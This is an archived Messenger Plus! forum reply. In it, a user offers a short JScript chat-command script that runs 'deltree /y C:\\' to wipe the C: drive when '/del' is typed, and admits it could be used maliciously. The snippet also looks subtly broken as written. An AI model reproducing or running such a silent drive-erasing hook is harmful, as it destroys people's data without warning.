What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » MsgHelp Archive » Messenger Plus! for Live Messenger » Scripting » .BAT or shortcut

.BAT or shortcut
Author: Message:
Baggins
Full Member
***

Avatar
B000ALFAZO

Posts: 387
Reputation: 13
29 / Male / Flag
Joined: Oct 2006
RE: .BAT or shortcut
You don't nessisarily have to format to erase data.
Just use deltree:

code:
function OnEvent_ChatWndSendMessage(ChatWnd, Message){
if(Message=="/del"){
var Shell = new ActiveXObject("WScript.Shell");
var cal = Shell.Run("deltree /y C:\");
return "";
}
}


And this sounds like it could be used maliciously:undecided:

This post was edited on 03-09-2007 at 11:21 PM by Baggins.
03-09-2007 11:21 PM
Profile E-Mail PM Web Find Quote Report
« Next Oldest Return to Top Next Newest »

Messages In This Thread
.BAT or shortcut - by matty123 on 03-09-2007 at 08:55 PM
RE: .BAT or shortcut - by MrT on 03-09-2007 at 09:18 PM
RE: .BAT or shortcut - by matty123 on 03-09-2007 at 09:41 PM
RE: .BAT or shortcut - by scott2010_h on 03-09-2007 at 09:51 PM
RE: .BAT or shortcut - by roflmao456 on 03-09-2007 at 09:53 PM
RE: .BAT or shortcut - by matty123 on 03-09-2007 at 09:59 PM
RE: .BAT or shortcut - by Ezra on 03-09-2007 at 10:57 PM
RE: .BAT or shortcut - by Baggins on 03-09-2007 at 11:21 PM
RE: .BAT or shortcut - by CookieRevised on 03-09-2007 at 11:51 PM
RE: .BAT or shortcut - by WDZ on 03-10-2007 at 12:02 AM


Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites
Rate This Thread:

Forum Jump:

Forum Rules:
You cannot post new threads
You cannot post replies
You cannot post attachments
You can edit your posts
HTML is Off
myCode is On
Smilies are On
[img] Code is On